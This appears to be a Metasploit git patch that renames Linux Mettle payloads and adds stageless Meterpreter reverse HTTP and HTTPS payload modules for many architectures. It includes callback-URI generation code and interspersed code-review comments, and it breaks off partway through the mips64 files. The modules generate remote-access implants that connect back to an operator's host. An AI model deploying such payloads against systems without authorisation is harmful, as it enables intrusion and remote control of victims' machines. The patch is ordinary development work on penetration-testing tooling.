From 353191992fc29057842adc0bbff92d808bd49556 Mon Sep 17 00:00:00 2001 
From: Brent Cook Date: Tue, 21 Mar 2017 04:38:18 -0500 Subject: [PATCH 1/7] move mettle payloads to meterpreter, add reverse_http/s stageless --- ...ttle_linux.rb => meterpreter_x64_linux.rb} | 2 +- .../base/sessions/meterpreter_x86_linux.rb | 6 + .../sessions/meterpreter_x86_mettle_linux.rb | 29 --- lib/msf/base/sessions/mettle_config.rb | 77 ++++++- lib/rex/payloads/meterpreter/uri_checksum.rb | 2 +- .../linux/aarch64/meterpreter_reverse_http.rb | 42 ++++ .../aarch64/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/armbe/meterpreter_reverse_http.rb | 42 ++++ .../linux/armbe/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/armle/meterpreter_reverse_http.rb | 42 ++++ .../linux/armle/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/mips64/meterpreter_reverse_http.rb | 42 ++++ .../linux/mips64/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/mipsbe/meterpreter_reverse_http.rb | 42 ++++ .../linux/mipsbe/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/mipsle/meterpreter_reverse_http.rb | 42 ++++ .../linux/mipsle/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/ppc/meterpreter_reverse_http.rb | 42 ++++ .../linux/ppc/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/ppc64le/meterpreter_reverse_http.rb | 42 ++++ .../ppc64le/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/x64/meterpreter_reverse_http.rb | 42 ++++ .../linux/x64/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 15 +- .../linux/x86/meterpreter_reverse_http.rb | 42 ++++ .../linux/x86/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => 
meterpreter_reverse_tcp.rb} | 15 +- .../linux/zarch/meterpreter_reverse_http.rb | 42 ++++ .../linux/zarch/meterpreter_reverse_https.rb | 42 ++++ ...erse_tcp.rb => meterpreter_reverse_tcp.rb} | 11 +- .../linux/armle/{mettle.rb => meterpreter.rb} | 0 .../mipsbe/{mettle.rb => meterpreter.rb} | 0 .../mipsle/{mettle.rb => meterpreter.rb} | 0 .../linux/x64/{mettle.rb => meterpreter.rb} | 4 +- .../payloads/stages/linux/x86/meterpreter.rb | 214 ++++++------------ modules/payloads/stages/linux/x86/mettle.rb | 98 -------- tools/modules/generate_mettle_payloads.rb | 45 ++++ tools/modules/linux_meterpreter_reverse.erb | 40 ++++ 46 files changed, 1222 insertions(+), 348 deletions(-) rename lib/msf/base/sessions/{meterpreter_x64_mettle_linux.rb => meterpreter_x64_linux.rb} (85%) delete mode 100644 lib/msf/base/sessions/meterpreter_x86_mettle_linux.rb create mode 100644 modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/aarch64/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/armbe/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/armle/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/mips64/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 
modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/mipsbe/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/mipsle/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/ppc/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/ppc64le/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) create mode 100644 modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/x64/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (65%) create mode 100644 modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/x86/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (65%) create mode 100644 modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb create mode 100644 modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb rename modules/payloads/singles/linux/zarch/{mettle_reverse_tcp.rb => meterpreter_reverse_tcp.rb} (74%) rename modules/payloads/stages/linux/armle/{mettle.rb => meterpreter.rb} (100%) rename 
modules/payloads/stages/linux/mipsbe/{mettle.rb => meterpreter.rb} (100%) rename modules/payloads/stages/linux/mipsle/{mettle.rb => meterpreter.rb} (100%) rename modules/payloads/stages/linux/x64/{mettle.rb => meterpreter.rb} (95%) delete mode 100644 modules/payloads/stages/linux/x86/mettle.rb create mode 100755 tools/modules/generate_mettle_payloads.rb create mode 100644 tools/modules/linux_meterpreter_reverse.erb diff --git a/lib/msf/base/sessions/meterpreter_x64_mettle_linux.rb b/lib/msf/base/sessions/meterpreter_x64_linux.rb similarity index 85% rename from lib/msf/base/sessions/meterpreter_x64_mettle_linux.rb rename to lib/msf/base/sessions/meterpreter_x64_linux.rb index 2a81312faa..98e61cdfbd 100644 --- a/lib/msf/base/sessions/meterpreter_x64_mettle_linux.rb +++ b/lib/msf/base/sessions/meterpreter_x64_linux.rb @@ -10,7 +10,7 @@ module Sessions # This class creates a platform-specific meterpreter session type # ### -class Meterpreter_x64_Mettle_Linux < Msf::Sessions::Meterpreter +class Meterpreter_x64_Linux < Msf::Sessions::Meterpreter def supports_ssl? false end diff --git a/lib/msf/base/sessions/meterpreter_x86_linux.rb b/lib/msf/base/sessions/meterpreter_x86_linux.rb index 3d42c27618..ca83001525 100644 --- a/lib/msf/base/sessions/meterpreter_x86_linux.rb +++ b/lib/msf/base/sessions/meterpreter_x86_linux.rb @@ -11,6 +11,12 @@ module Sessions # ### class Meterpreter_x86_Linux < Msf::Sessions::Meterpreter + def supports_ssl? + false + end + def supports_zlib? + false + end def initialize(rstream, opts={}) super self.base_platform = 'linux' diff --git a/lib/msf/base/sessions/meterpreter_x86_mettle_linux.rb b/lib/msf/base/sessions/meterpreter_x86_mettle_linux.rb deleted file mode 100644 index 80c4a1b853..0000000000 --- a/lib/msf/base/sessions/meterpreter_x86_mettle_linux.rb +++ /dev/null 
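Review bot: The `supports_ssl?` and `supports_zlib?` overrides added to `Meterpreter_x86_Linux` have no comment saying what they govern. The same commit adds `reverse_https` singles for Linux, so a bare `supports_ssl? false` can be read as "these sessions are never encrypted". If the predicates describe optional features of the session's own packet channel rather than the HTTPS transport (that is inferred from the names, the base class is not visible here), say so above them, for example `# Capability flags for the session channel only; TLS for reverse_https is provided by the transport, not by these flags`. A blank line between the two new methods and `initialize` would also match the usual Ruby layout. The class body continues past the end of this hunk.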
@@ -1,29 +0,0 @@ -# -*- coding: binary -*- - -require 'msf/base/sessions/meterpreter' - -module Msf -module Sessions - -### -# -# This class creates a platform-specific meterpreter session type -# -### -class Meterpreter_x86_Mettle_Linux < Msf::Sessions::Meterpreter - def supports_ssl? - false - end - def supports_zlib? - false - end - def initialize(rstream, opts={}) - super - self.base_platform = 'linux' - self.base_arch = ARCH_X86 - end -end - -end -end - diff --git a/lib/msf/base/sessions/mettle_config.rb b/lib/msf/base/sessions/mettle_config.rb index d5a9678dc9..c57c13b8b2 100644 --- a/lib/msf/base/sessions/mettle_config.rb +++ b/lib/msf/base/sessions/mettle_config.rb 
@@ -1,22 +1,75 @@ # -*- coding: binary -*- require 'msf/core/payload/transport_config' +require 'msf/core/payload/uuid/options' require 'base64' module Msf -module Sessions -module MettleConfig + module Sessions + module MettleConfig - include Msf::Payload::TransportConfig + include Msf::Payload::TransportConfig - def generate_config(opts={}) - transport = transport_config_reverse_tcp(opts) - opts[:uuid] ||= generate_payload_uuid - opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip - opts[:uri] ||= "#{transport[:scheme]}://#{transport[:lhost]}:#{transport[:lport]}" - opts.slice(:uuid, :uri, :debug, :log_file) + def generate_uri(opts={}) + ds = opts[:datastore] || datastore + uri_req_len = ds['StagerURILength'].to_i + + # Choose a random URI length between 30 and 128 bytes + if uri_req_len == 0 + uri_req_len = 30 + luri.length + rand(127 - (30 + luri.length)) + end + + if uri_req_len < 5 + raise ArgumentError, "Minimum StagerURILength is 5" + end + + generate_uri_uuid_mode(:init_connect, uri_req_len, uuid: opts[:uuid]) + end + + def generate_http_uri(opts) + if Rex::Socket.is_ipv6?(opts[:lhost]) + target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]" + else + target_uri = "#{opts[:scheme]}://#{opts[:lhost]}" + end + + target_uri << ':' + target_uri << opts[:lport].to_s + target_uri << luri + target_uri << generate_uri(opts) + target_uri + end + + def generate_tcp_uri(opts) + if Rex::Socket.is_ipv6?(opts[:lhost]) + target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]" + else + target_uri = "#{opts[:scheme]}://#{opts[:lhost]}" + end + target_uri << ':' + target_uri << opts[:lport].to_s + target_uri + end + + def generate_config(opts={}) + opts[:uuid] ||= generate_payload_uuid + case opts[:scheme] + when 'http' + transport = transport_config_reverse_http(opts) + opts[:uri] = generate_http_uri(transport) + when 'https' + transport = transport_config_reverse_https(opts) + opts[:uri] = generate_http_uri(transport) + when 'tcp' + transport = 
transport_config_reverse_tcp(opts) + opts[:uri] = generate_tcp_uri(transport) + else + raise ArgumentError, "Unknown scheme: #{opts[:scheme]}" + end + opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip + opts.slice(:uuid, :uri, :debug, :log_file) + end + + end end - -end -end end diff --git a/lib/rex/payloads/meterpreter/uri_checksum.rb b/lib/rex/payloads/meterpreter/uri_checksum.rb index ac42c0c0f8..ef005cd23d 100644 --- a/lib/rex/payloads/meterpreter/uri_checksum.rb +++ b/lib/rex/payloads/meterpreter/uri_checksum.rb @@ -66,7 +66,7 @@ module Rex # @param len [Integer] An optional URI length value, including the leading slash # @return [String] The URI string for connections def generate_uri_uuid(sum, uuid, len=nil) - curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN+rand(URI_CHECKSUM_CONN_MAX_LEN-URI_CHECKSUM_UUID_MIN_LEN) + curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN + rand(URI_CHECKSUM_CONN_MAX_LEN - URI_CHECKSUM_UUID_MIN_LEN) curl_prefix = uuid.to_uri if len diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..de51b8ac8f --- /dev/null +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb 
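Review bot: In `generate_uri`, the default-length branch `30 + luri.length + rand(127 - (30 + luri.length))` passes `rand` a zero or negative argument once `luri` is 97 characters or longer. Assuming this resolves to `Kernel#rand`, a zero argument returns a Float and a negative one is taken by absolute value, so the length stops being an integer inside the intended range. The comment "between 30 and 128 bytes" does not describe the expression either once `luri` is non-empty. I would clamp the span, `span = [127 - (30 + luri.length), 1].max` followed by `uri_req_len = 30 + luri.length + rand(span)`, and reword the comment to the real bounds. Separately, `generate_config(opts={})` still advertises an empty default but now raises `Unknown scheme:` when `:scheme` is missing, so either document the key as required or keep the old behaviour with `opts[:scheme] ||= 'tcp'`.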
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_linux'
+
+module MetasploitModule
+
+ CachedSize = 646808
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_AARCH64,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_aarch64_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'http'}
+ MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
new file mode 100644
index 0000000000..eed97cb69c
--- /dev/null
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_https'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_aarch64_linux'
+
+module MetasploitModule
+
+ CachedSize = 646808
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_AARCH64,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttps,
+ 'Session' => Msf::Sessions::Meterpreter_aarch64_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'https'}
+ MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/aarch64/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
similarity index 74%
rename from modules/payloads/singles/linux/aarch64/mettle_reverse_tcp.rb
rename to modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
index 8ce52ca5eb..8ca59fe4d0 100644
--- a/modules/payloads/singles/linux/aarch64/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb
@@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config'
@@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_AARCH64, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..c1e17751ff --- /dev/null +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb 
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_armbe_linux'
+
+module MetasploitModule
+
+ CachedSize = 639520
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_ARMBE,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_armbe_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'http'}
+ MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
new file mode 100644
index 0000000000..fc35312f1a
--- /dev/null
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_https'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_armbe_linux'
+
+module MetasploitModule
+
+ CachedSize = 639520
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_ARMBE,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttps,
+ 'Session' => Msf::Sessions::Meterpreter_armbe_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'https'}
+ MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/armbe/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
similarity index 74%
rename from modules/payloads/singles/linux/armbe/mettle_reverse_tcp.rb
rename to modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
index e399f321e4..5ee0c63881 100644
--- a/modules/payloads/singles/linux/armbe/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb
@@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config'
@@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMBE, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..676228da47 --- /dev/null +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb 
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_armle_linux'
+
+module MetasploitModule
+
+ CachedSize = 638320
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_ARMLE,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_armle_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'http'}
+ MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
new file mode 100644
index 0000000000..45e065ce68
--- /dev/null
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_https'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_armle_linux'
+
+module MetasploitModule
+
+ CachedSize = 638320
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_ARMLE,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttps,
+ 'Session' => Msf::Sessions::Meterpreter_armle_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'https'}
+ MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/armle/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
similarity index 74%
rename from modules/payloads/singles/linux/armle/mettle_reverse_tcp.rb
rename to modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
index 414d9d3b4a..bbc1472a37 100644
--- a/modules/payloads/singles/linux/armle/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb
@@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config'
@@ -21,10 +20,11 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Run the mettle server payload (stageless)', + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', 'Author' => [ - 'Adam Cammack ' + 'Adam Cammack ', + 'Brent Cook ' ], 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, @@ -36,6 +36,7 @@ module MetasploitModule end def generate - MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config).to_binary :exec + opts = {scheme: 'tcp'} + MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec end end diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb new file mode 100644 index 0000000000..1fb23e0ba5 --- /dev/null +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb 
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_http'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_mips64_linux'
+
+module MetasploitModule
+
+ CachedSize = 1019344
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTP Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPS64,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttp,
+ 'Session' => Msf::Sessions::Meterpreter_mips64_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'http'}
+ MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
new file mode 100644
index 0000000000..cca7335f5f
--- /dev/null
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb
@@ -0,0 +1,42 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/handler/reverse_https'
+require 'msf/base/sessions/meterpreter_options'
+require 'msf/base/sessions/mettle_config'
+require 'msf/base/sessions/meterpreter_mips64_linux'
+
+module MetasploitModule
+
+ CachedSize = 1019344
+
+ include Msf::Payload::Single
+ include Msf::Sessions::MeterpreterOptions
+ include Msf::Sessions::MettleConfig
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',
+ 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
+ 'Author' => [
+ 'Adam Cammack ',
+ 'Brent Cook '
+ ],
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPS64,
+ 'License' => MSF_LICENSE,
+ 'Handler' => Msf::Handler::ReverseHttps,
+ 'Session' => Msf::Sessions::Meterpreter_mips64_Linux
+ )
+ )
+ end
+
+ def generate
+ opts = {scheme: 'https'}
+ MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec
+ end
+end
diff --git a/modules/payloads/singles/linux/mips64/mettle_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
similarity index 74%
rename from modules/payloads/singles/linux/mips64/mettle_reverse_tcp.rb
rename to modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
index 9b14d5b953..a4e2037ae9 100644
--- a/modules/payloads/singles/linux/mips64/mettle_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb
@@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config'
